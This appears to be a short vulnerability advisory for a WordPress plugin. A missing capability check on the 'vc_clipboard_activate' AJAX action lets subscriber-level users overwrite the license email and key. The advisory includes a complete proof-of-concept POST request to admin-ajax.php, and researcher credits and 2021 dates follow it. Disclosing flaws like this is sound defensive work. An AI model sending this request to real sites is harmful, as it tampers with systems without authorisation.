An AJAX action registered by the plugin did not have capability checks, allowing low privilege users, such as subscribers, to update the license options (key, email).
When logged in as a user with Subcriber role or greater, submit a request to wp-admin/admin-ajax.php with action = "vc_clipboard_activate" and arbitrary data can be added to the sanitized "email" or "license_key" parameters. POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 58 Connection: close Cookie: [Subscriber+ cookies] action=vc_clipboard_activate&email=a&license_key=something
Charles Strader Sweethill
Charles Strader Sweethill
Yes
2021-04-06 (about 1 years ago)
2021-04-06 (about 1 years ago)
2021-04-07 (about 1 years ago)